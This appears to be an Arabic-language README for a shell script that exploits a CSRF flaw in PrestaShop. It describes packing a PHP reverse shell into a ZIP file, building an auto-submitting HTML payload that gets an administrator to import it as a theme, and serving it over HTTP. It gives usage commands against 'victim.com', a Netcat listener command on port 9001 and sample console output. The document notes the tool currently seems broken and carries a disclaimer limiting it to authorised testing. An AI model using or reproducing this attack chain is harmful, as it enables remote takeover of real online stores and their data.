
نص استغلال CSRF آلي لـ PrestaShop يقوم برفع وتنفيذ قوقعة عكسية PHP عبر حمولة ZIP مصممة، ويتطلب مستمع Netcat لالتقاط الاتصال.
يقوم هذا السكربت بأتمتة استغلال ثغرة CSRF (تزوير الطلب عبر المواقع) لرفع صدفة عكسية PHP على خادم الويب المستهدف وتنفيذها. يتم تسليم الصدفة العكسية كملف ZIP عبر حمولة CSRF مصممة، يتم تفعيلها عندما يتفاعل مستخدم متميز مع نقطة نهاية محددة. يتطلب السكربت وجود مثيل Netcat يستمع لاستقبال اتصال الصدفة العكسية.
يبدو معطلاً الآن وسيتم تحديثه لاحقاً
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url: عنوان URL الأساسي للهدف (مثل https://example.com).admin_endpoint: مسار نقطة نهاية استيراد سمة لوحة الإدارة.admin_email: عنوان بريد إلكتروني لمسؤول (لتزويره في الحمولة).attacker_ip: عنوان IP حيث سيستمع مستمع الصدفة العكسية لاستقبال الاتصال../exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ip المقدم والمنفذ 9001.love.php) إلى Love-exploit.zip.csrf_payload.html) تحتوي على سكريبت JavaScript لإرسال طلب ضار تلقائياً إلى لوحة إدارة الهدف لاستيراد الصدفة العكسية.8000 لتقديم ملف Love-exploit.zip للهدف ليستورده.ابدأ مستمع Netcat على جهازك:
nc -nvlp 9001
قم بتشغيل السكربت:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
انتظر حتى ينفذ الهدف حمولة CSRF ويستقبل اتصال الصدفة العكسية.
يقوم السكربت بإخراج المعلومات التالية أثناء التنفيذ:
8000 (خادم HTTP) و 9001 (مستمع Netcat) خالية قبل تشغيل السكربت.[*] تأكد من أن Netcat يستمع: nc -nvlp 9001
[*] انتظار مستمع netcat...
[*] إنشاء صدفة عكسية PHP...
[*] تغليف الصدفة كـ Love-exploit.zip...
[*] جلب رمز CSRF...
[+] تم استرداد رمز CSRF: <token_value>
[*] بناء حمولة HTML لـ CSRF...
[*] تحويل HTML إلى PNG...
[*] التحقق من وجود خادم HTTP على المنفذ 8000...
[*] بدء خادم HTTP جديد على المنفذ 8000 لتوصيل الحمولة...
[*] رفع حمولة XSS لتفعيل CSRF...
[*] إبقاء السكربت قيد التشغيل لمراقبة الاتصالات الواردة...
هذا المستند مخصص للاستخدام من قبل مختبري الاختراق وباحثي الأمن السيبراني في بيئات خاضعة للرقابة. الاستخدام غير المصرح به لهذه الأداة لأغراض غير قانونية ممنوع منعاً باتاً.
هذا السكربت مخصص للأغراض التعليمية وتقييمات الأمن السيبراني القانونية فقط. الاستخدام غير المصرح به ضد نظام دون إذن غير قانوني ومخالف للمبادئ الأخلاقية.